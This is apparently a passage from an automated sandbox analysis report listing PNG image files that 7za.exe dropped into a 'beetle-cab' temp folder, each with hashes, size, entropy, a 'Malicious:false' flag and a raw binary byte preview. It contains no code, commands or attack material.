      SHA-512:8AA4B700C34EF8B6B8A69E3EB057873D520F4E52B43BE6916B9F62B0BC06E58838738EE022DF772C70F921586F0C0F8BAC983EFA0126CF9C1C7936291791F13D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............s|N....sRGB.......3qIDATx..}....u.....3......U.......cc.l.....q.l#^l../.-.l....q.# 66. l.x...X.v..e..4.f..z........z.-.....=..s.=w)...=........p.....P(.........q.C..p....(....z.......:.......z.......:.......z.......:.......z.......:.......z.......:.......z.......:..."LUe|............1...$.b..W.5....._..8..S...lg.pu7......).{.....#..s?..pD.I....r..$..Z..y.Yr....^)...5..].[o.l%.BL.p.....3........Y....c...lv........B..g..S...o............jU.1..........@g....../.q]...m.D..jT..U.bR..A#BA. w%....;.$7..b......;./..1zzzhZ88..7_^.|.4E...V...J`...MZ............N..M;t....\S&J$.4...X....(t.y..M.0..{-..P#...l.u\!Q`.DI..U.%?{rEm(.......P.....8v.`.........x&.....u..c..P..1.C.......i..I3..6.$.......n_.../.....b..J=....b.v. .$.ah....s.t.5B...s9,......KB....y..V..u........@....B.O.Gl....g.Y.\R.c.\..F..`.F?.\-.`.\..F..`.F?.\-l..3.VT?......Nu.`...".,//.....U?...4e.Nt.w.c.6.. I.K..E...U...jg..*/^...3.?z,.jc...F=...."Y.,......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 490 x 372, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):60464
      Entropy (8bit):7.986397417672263
      Encrypted:false
      SSDEEP:
      MD5:155771FD0AC53DDB317D61F5B9C98FDD
      SHA1:C4ACEB8755F36494E8B1FC6178F9D5BBC194E8AD
      SHA-256:7EDDB9EB56C0257E1CC94884EEAAEB30815378CDAE7BE2CB4574EF340880914C
      SHA-512:F76A86DC587056E1D05911AC4A5E51007F8EC8CE49E521D1744D82D91F790CD6A1406FFA42C19AB61F16F91A6C7B616DDB00DB5292722D3A56319B9F52D7C9C9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......t.......z.....sRGB.......@.IDATx.....G.?^.&..&m.v.....0.l..9...'..p..........t...q..|`..cXpBF........[.%KV........j.g.{v.wfwf.j..u....f...Zc*(.<..m[.X.9lZ.p,b.R.35'l0..6.]K.>s...0.3ffMi..[.......P:.nY.dF7#i-d..,.....JGGF.7oNe..B@!..P.....aq".E .v..!..4..k.....i...#.9..f@..v2F.Z....d,cMn.|......S.(...5.."...:...pl.4..z..1.F'.42..p...l.1&a:?.p..O^6.e.....B@!..X..(.^....=.b....i.5.....$/..Xl.....8..y...k.j.B@!..`L.....l..<6.Zu#.....<u=op.F..p*...a.F..g.|Q.+......"....`........r.9-.f6.e.^.^..uc`.....k'k._.B@!..(..".b..X..7o.6vD.3v...Y...Iw4'3..D..=uQ...].]..R.(.f@@.....w6..........9..L..5.....7.p~:.!...P.(....E.s.w.}.......]7[JVR.KC@..OL.;...7.G.JCL.R.(....E...~a...F.yY..t....*.W..!.8.....[C..o..U....,)......"....x..v..b=.nX.9N]=....5..1k.......j.5.B@!..P.g..w.....4..........|.[n...H.Y;.M.........B.Z...u..-b.....([...-)RLe....i..=...n.A.t6O}..U.(.r.(..aQ.=...6.W8!.K.t.}...E..R.X......8.e...T.,.T.......Pd1;.J..w...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 264 x 210, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):12333
      Entropy (8bit):7.9700848864035985
      Encrypted:false
      SSDEEP:
      MD5:52D440015C4401DD73FECA5605F7EC2D
      SHA1:94147CB76D941BC55E30ED0037169CDA94BDFCAE
      SHA-256:8A7E921D387D3E88F023DCF35662056C08B916CBC5828A7F4F4C0708E28A571A
      SHA-512:948AA4164A0FD442241AC5C73C1FC1200F39219D081C078BF2844D7FF337503692AD13393FF49500F03F4D7DB5C540A2EE188D5FBAB8AE9440D7F8DAEC3075D7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............$^.....sRGB......./.IDATx..}..\E.~..%3.d...... .@.d..YD..`x..4>..(.....#..Q.)D....L... .".`.EV!.$...@B..Y.....d*.....*...[u.S_U...[.^.L(K.f>$jl.....L.m1.b|..N.1k.4x..l<..q..}.A.\.....}.....uLX.9...3k...M..8.s6.qZ}..z&Q...l.G.u...{T..k..............Z8......S..cp...gd.... J.yA4.xDT.......sf2....)..:.d..&6.A....#|O..G..#.Z#'.8...Wl...'......g.8.Na.k..|....G..f..^[V.>.s....."`.DBX...=].j...ajp..,...!..#.{..e^.p.F.8..=.D..[D.oR..X.....(.}.......A.`......b|.W._.v..n.q.......;....`....c]f^!....;.1t....b..+.p#.0...Q...B...{z..F.w!l......3....g.s.>...->..A........#.......d 5sY..b.b......T.W.-.A.3.BSg..3..}.E)~.N...,.......l...na..0.}.c.wXNW.....D_..c.94.xE..+.*.Q.6.Sg......|..Z..]'..c.UY....\l.._.T....Y..e.....:H.-.Q.hj..j...P.7...r._~..}..6.......5fD...5G..g.|55..7.....p...Q9.W...g....R.Q3.......L..Np.$..\.\..........q.g.].qbY.7n...y..:.`V.......l.......&.+\+..L.(n.gj....h...n.....\....z..Z.\.<...{{.n.ZU.v.G....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 240 x 240, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):8547
      Entropy (8bit):7.933369069303509
      Encrypted:false
      SSDEEP:
      MD5:45307E0A61BB959EC6CABC021E63E215
      SHA1:C2C7BB9B4947F2B3AFC043B7931C8171991BD762
      SHA-256:FF5CB3DADEFE3780D114BCD657592FD4699D32466E3251EA679D2BCA5692330B
      SHA-512:7A0D96BE00E45FAD74FC2339A21848B32D117977D36585AAF603E98BAA7B802D2BBE6E7FB51829113B298620B55776810205DEF95BE0DB31F11F0B6DCCAC8FDE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............>U.....sRGB.......!.IDATx..]..Ue..Q3..P.....P."......H..m...)&G-....(.j...h.5..c._..(.....&P8>...G<|K.w."]..........r..Z.......;k.V;...B@....>{..k.,.....(.u'...#......u!...= .r...8.'...X....1......\...`..B ..(.s|xr].(.u....#......u!...= .r...8.'..>i!X.dIx....gJ...n.....E...KM........}.s...../MY....._....={...&....n.)....em...7n4e.>..g...G..z......:v.H.i..OO..)..]..I.&....i..._.4..z..(..M.{<.....<..$.:u*.[__..N....v....Q.1..Ce_......GCC....A..{'.xb10....}....G@.\.#..B =.....IS.T...p.@.....(..c'M!Pq.R.H..|.9..e....j..t...F.F|;.6o.l^..'.P..P2.mrh...f.v...:t...7...o...{.2L.[..l.....?....~...2M.@.w.I4RZ...K..4.!C(..j!...U...a;e..s=.1v.XO..u.Q.G]..7....<.;K..U4RDGC..*....VO^......Uq..D.".........pU..6Q..T.F.MR..U...R..'.k....O......{.5].\|3..e...X:..Ub.._...^...W.^.r..)...........5j..jzQ....}"...<.S......?.f"uEq..g.?.(...}.z.....{.'.t*...\@1(.|.R.S.....b.......!.....}'.r...8wG&...g.(.?.B....!
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):21972
      Entropy (8bit):7.924649713940346
      Encrypted:false
      SSDEEP:
      MD5:22509871F51DC098F2D2F5BDC10C85E8
      SHA1:3B6722D66BCD0AA07700A220D5C47095050E2B9F
      SHA-256:775A44111FDE1557FDA49EB283731DD3AB6E51D2E984C248966B48E7833CC4F8
      SHA-512:1D2C385AADA4421B9DA60A510D0ABE083F41B9A4C4C98C02E04A35251A61D49DE882102358B617F69A70F1D801E79168ACC9AEC5D2B79027099E863CD1A450AC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx....\U...}..Z.N....@..H...dST.#(**.....G..(*...|..0......*AI:.."....tzI..V]..w^u........Z.{..{.9.[.:u.y.............................................................................................................................................................................................................................................................................................................................................................................|...... .. ....U...`p..j..:).L)E5.YFR..i%|^.e.N%$..B.....w..>....?@......;B.'.._..3.....@..R%.'+UR... .3..--...YDB,d.j..^..B.<...YGI.I)...]\m.F.S....H......&i.. .. .......P..@ S..--..).D's.h..\..'.!|..,D;.......?..H>/B..[...o... ...8Y.%,....h_.....VpD.L.N........J.s)..".!..*.B..l..j...8.......Rh0a......N.....y..2.j........"..Q..S......CE.........,...T..+..li9.....N..X..s.t....N?...~]...............,s...........!..).w.....4.X.8\&......".'.@....X.@Gs.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):43843
      Entropy (8bit):7.942234184224165
      Encrypted:false
      SSDEEP:
      MD5:47BA69B76F7FD086667EAA21572D604A
      SHA1:51FE8BCC76B7895B50EF5403C24BC51565A72542
      SHA-256:D9AD2545DE51A0D6194F6AC1CA6E46A35E7D751AB3B0D9966212A8BC34ED5934
      SHA-512:C8C0335CD30B265C064F02AF46B36C75ECEAE62A7FC8EE0372271CD97BACA80E882822E79C982F514CD308CAFF65DDEDED69D5C949EE6E1D2D242EECEFA1CFA8
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx......u.~z.f..H3.e....f..."0.....86"..M......b'/.Kb.../....x.c...c0b5b.X$!!iF.e.}z_...........s...{._.T}u........ ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... .....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):38525
      Entropy (8bit):7.933843615082871
      Encrypted:false
      SSDEEP:
      MD5:B5498414D2A28385E45B2B3E212A4360
      SHA1:5D5306B733FE9F0DD523760E401B590B2E737C3C
      SHA-256:F2327EB399E44FCB928BB5CD424BCB9325D96C5735112643BF4DF75D52D63598
      SHA-512:81E6D0BD2C44700A1B20C5A068829EFBC033C460E3088FCE7DA120B837C2901821A5C1725B1638A36528AD8DC200A772E54CC8646B5802D1404F6584782AA9E0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}..........f..a.Ed7.......M.h.....%yY..I^^^"..D.(.D...%n......(.........K......z...9W.[u..s......s.=.H. ..... ..... ..... ..... ..... ..... ..S...t.2lA@.....A@....6m..j.&&&>;k..8P.b..LN..A@.....A@..!..l.R.u.........R- U.d...T....A@.....h#.bUi.s..<.N.d...$J.... .....[.p..S.E..kM.qq*$+.>&QR.....A@.....`...m.c...q7..)..dE.I.#..... ...*..4_._(.r.H.z>.....B........A@.....!...y..bX......./..a2..q#[..`U[.M=.dE.m.K.....A@..&.8..e.P.e.G;..Z.]fr..#.dOHV.?m.O.....A@.....3g.....2D+.".=gkM........S...s.O.d...t ..... ..O.`9...y(.,X........@sX.V.u....s.1........ ..... 0...1b...5.Q... [7!...` ...2.?Eo..]...Q.d[..A-..... ......&; I.O..&-...L..!$.O.......%...&.dE.n.L.....A@..^...Y ;k.1z..X.~T..... X<N!Y..$A@.....A@........~.8f....c..2w.q.~....... ..... ....OQn.I.qEc.=KSA@.....A@.....A@.....A@.....A@.....A@.....A@.....A@.....A@........8Yv!+r..A@.....A ...M.............6..1.$.DrA@.....A@....;.."...,..j.-...."$
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):63092
      Entropy (8bit):7.988336820396776
      Encrypted:false
      SSDEEP:
      MD5:0A51D8E9634C8B6759F8B0B387995CE4
      SHA1:9A4341867E91D2869070B660526F248FE53331CE
      SHA-256:E4D687D0674F9A9121E72E6F6E98BCCFCD3C34885576B3F907206492E7E3EE99
      SHA-512:7705789DB5F58D55E676514CE9E7C6D17EDA4908FC6F2250B47C509E2BF6160CDF0AEC9CD317DAD68A0906F1F4AD5EF43DDF298FDDA58E55331656DC8D68200A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx....$.Y&.G..........gZ3.qh..-.-. !`........p.-~O........!$@.4..h4...tO{[]...Mz.q.."..TdfdvUu....22../^.......":i.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#....h.4.....F@#.z.0V.P.H.!`#5..k.4.....5A......k.nt..0..f].F@#....h.4...5..&Yk...k.4.....F@#.x.h..x..5.....F@#..X..h...o...F@#....h.4....&Y....Y#....h.4...5..&Yk...k.4.....F@#.x.h..x..5.....F@#..X..h...o...F@#....h.4....&Y....Y#....h.4...5..&Yk...k.4.....F@#.x....j].F@#....@1.@_..O..P.a....0$...4.....5@@..k..nR#...(...H.,..eK6gI6.w[rx.G.[..x....*.,..... .VA.)!....>..|..J=B..F`.".I..u.........R^.&[2 P.TNf.y.IX.KY.H.X.HAV.D...?>.(.%...........)mx.X.q.....<....Y.....h.....d-.;....X....z|Oe.26....L...R"EI....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):43735
      Entropy (8bit):7.9755381350093195
      Encrypted:false
      SSDEEP:
      MD5:E6B2983CA9B1950374D0EAB7F7DD5C3F
      SHA1:AD3D26BACA210907127739A6A1991890BE1CB1B8
      SHA-256:D18D71F67FBBB5FFCB0270563819D255108EDA600C5B18D5EF5B20F6C4322CE6
      SHA-512:E04FFFF126CC1FD2B8807C815DFC50EE46C0BA05E6B7D4379CE15F275092203F5A1D933B12500401CD81E9364FCE2B17F5E52C01B0985EA9CDA50CCA0F0D17FA
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}...e..3.{{..^.\z.4B....+B..H..V..CEE.)*..WAE.Q.A..........].]....vow..<......}.O&3..[.3...y...`a...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`......:.JF..`....Q.....a.;.A...<|..`...F..`...F.....a.<I.)?...F..`...F..`...F..`...F..`...F..`....C.}...p...F B.@;.....N....a.5.F...b.TQ<v.:#..0.."p.V..d..[1.g...F..`...F..`...F..`...F..`...F..`.B...d..gn..`.B...-W./.p3.P...,..x..W5..p=.M..<J.|.g."(...g$.z...z.k...ELK.O.:?.m.iu...#.E..OV..l.*#0..X..S.#....q.e.ey...`..fCRT."<..?y...K..y.KI.+...,....F`.#...y..y..B.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):76644
      Entropy (8bit):7.993367258425601
      Encrypted:true
      SSDEEP:
      MD5:9E11BA11DEA83155B3814F4588F7DA19
      SHA1:080A19238537AD3B68E60AF1BB7BE4EAAC3300E5
      SHA-256:6ECC7BBF4BF1EC175F381C7FE3D783AF38D71EEBBC55A4B5D326B766351C27F3
      SHA-512:41348268198D70FE59E5A023B5DBC9AAFC8ED16AB658C073347FA34547D3F1631679C830FA60D6B69C94573AB209CC443227FB6C26CE181F5E998F156CBAB13B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}.|....{w..;..l.r...1.$.B...K....$.....!!!@...`......m...n.w.t.~...t..2..z......g.J..G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8........{.op.8.C...:Gpx8E....pP..A..l..(..`...8..1a./... .HDz.7..."1..6;...Xk....X..*J.9dA....p.8....N.........h..8...%vJ..J..(..(.\...K.{..T.P..N5..T1n..|........p.F...d.....2,.how.C.4.!.q 7.X+..@.D%6..6..G..L$.Y.Z.y.8.....PC.....Dx.F<.L.'W..H..L..H=..}.AtLd.....a...e..G.#p...$.C.o.. r8.A..4.X.c.+.!........G.m.f-...:..^.p.8.....C..,..p.."......9........,..7.qvB......CBDM.C......G.<#.I.y~...#...N.<x.]..42G.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 740 x 460, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):20092
      Entropy (8bit):7.800090765052613
      Encrypted:false
      SSDEEP:
      MD5:70EBAA7B41EA3195E49763CD7F306981
      SHA1:B0AF9CA3239F342C41D21047405FDF94656EBFBA
      SHA-256:4EEC53145F0D240FDF832EDF3DB43CBD85C2AD19935C1CE874FBBBB779BA43C0
      SHA-512:902568648D91E2C831E7240BE34221F1677C2FF334CB46A71C37FADC655072CEA4355B4FBEA428E6C05C8F065B9B9C661FB09311C1C09E21A03C84E223E140EF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............*.....pHYs................RiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2019-07-30T16:57:45+03:00" xmp:ModifyDate="2019-07-30T17:11:11+03:00" xmp:MetadataDate="2019-07-30T17:11:11+03:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:6c111f94-5292-4f22-a5a2-47cf5fbb5a3a" xmpMM:DocumentID="adobe:docid:photoshop:7690012b-f6d4-3041-bf1b-c8a992512
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):37300
      Entropy (8bit):7.967420665989814
      Encrypted:false
      SSDEEP:
      MD5:944693D0530FBC3BBC5F5AE654E17686
      SHA1:D92EA5A5B5097455057E953FAC0DB35F891A80A5
      SHA-256:C016DE0AF5874E8ECDAA4AC4E42197724BB1B852916BB0CB0B42DB861E565BDA
      SHA-512:59D443F7E64E8B06DAF9194645DBF699BE83A52450C5B90198E27574317BBF8356EC040D9625DA0A3FC379E4EF2EEC3A8CE91F2DBAD06ED5B8ACFAA325826F06
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......@.IDATx.....u.I...c.G;I..6.J.._..3..0... H..6(.....X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X........z`=..X.........O..q......g6;.....O.>...m...`..4G.|............i;...z................0..%.....\.,......|=..=...._...z................0..%.....\.,......|=..=...._...z.........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):23589
      Entropy (8bit):7.886791555877773
      Encrypted:false
      SSDEEP:
      MD5:E21B7C79B63A69AE55815D457A97B584
      SHA1:BA85ADB834B21E6B12BFF3B4705D9C0DB117D15B
      SHA-256:8683E154DDEA543E1130DA3BFE6EF45204AB64DB3CF9FA3C7B92C8AA4CE37499
      SHA-512:36C1558650ED4F791DFD1247F460822E80758B00882C109F709BF8F6D4530F319B67591F7C99F52D7F8F8EDDC73370BB100C12A484A57B83A5AB0E5D945F3538
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......@.IDATx..}..eUu..k..(.*....D.. j.....M4..I...K..)mC...$_..;s4.....5.#. ."....X.<...{.....s.{...T....zw.......Zw.s.=7%5! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):7391
      Entropy (8bit):7.451309013665083
      Encrypted:false
      SSDEEP:
      MD5:C0616F1442F66AFC634EDEEB2DA178FC
      SHA1:725F9D6A50DA1658D46DFF60D787731F90799AD8
      SHA-256:DFDD4590DCD22A9B5DAAF0FDC1426197A1C53FDC987760B70C1163395CEDB76D
      SHA-512:5375B301E3E2F968D37A80914F660D917DD6FFF952D0A8B551C3F666385923F5152CE34DF5D4772B66B6B4EC6CC8DD040C4180F8B37777FF478D7975D79F23A6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.........IDATx....t..y..{.I.m.,.B.B.Xh!...F...BC @...I9....Y.Y..,...q.JYNJ|.. ..A.E!I..`..b.....l,y{on..cY.{.....;..Oo......4...x!.... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... ...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):26202
      Entropy (8bit):7.8985020268456285
      Encrypted:false
      SSDEEP:
      MD5:02F3E3F2AAA40760EB8B8268498B657B
      SHA1:B4744056186D96B5D9A3654E89F7E79BAB741930
      SHA-256:4C7F783C622CC02343A7BF6E995BF0C8E77C63525E1E30729F4DE9AE7941E73E
      SHA-512:692421EC9A5DFA032F24898DADDBB882E92F7A3B15CF169E3628E790214403AED7512F9359439A7450D74C3378F017E4958812C31F945C0205D5DACD07261972
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......@.IDATx..}..eEu..g.C..tC34S#"....Q......D...&1.I.c...j^b.......y&.)..(...".26...4=..;....U.}.=..Kw.....]..V..].?{.gU....)..! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! ......B@...! .....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):25815
      Entropy (8bit):7.923098126160211
      Encrypted:false
      SSDEEP:
      MD5:6D336052020DD786335D7410A7A16C9C
      SHA1:009988C8BEE02CD7011C404F787E8F08EEFFB2F4
      SHA-256:1370EF68EF8BD1061F328EAE2AB91AE0E93123BA3178E431E14369DCC965C74F
      SHA-512:1BC8326183206E300BFD600675E2DA9284BE7E8C56F9D9F11A83D4D8740F9FC2692A8F63D37BFBC3C771296F9F6BF73B43774C296283235816C3ABFD6F7AADEF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......@.IDATx...b[...I..g....,..=...E).c;..`B.Y|...T...j(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.(.E...."P..@.x..O....eOOO...0......O.>.?oi........W...(........H.+.E.....L..,.E...(..;..... P....E...;.%.w....."..J0A.....wG....."P..@.&HT.."....`...vX..@.(...."P......C...@...%. QY....#P.ywH.a.(.A...$*.@.xw....=..?...._....A.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):8802
      Entropy (8bit):7.494022521497091
      Encrypted:false
      SSDEEP:
      MD5:34F2AAC994A5E5E5F1054DD9148AA7E9
      SHA1:A874B87BFA0346695A8EABAFAC705E85422FA312
      SHA-256:657935C095BD04DC6235911EA55D930AFF6FD5A8FE5852D4B365BDEF158BDB36
      SHA-512:8FC061FE4527DD6C5E04B02955C67BABF24D1880FF1A869821D12CAFC244542F62D8D87A8748991CB449F763E30EF90AF6A8A2AAF932CA19067849B99E371794
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......".IDATx....t.U...{.3y.&i.$.E..*....i....>p},..a.]u]]HqAt../.....X.(.QP<.<(*.j....XDh..I^.{...7..6.......|............Q.... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... 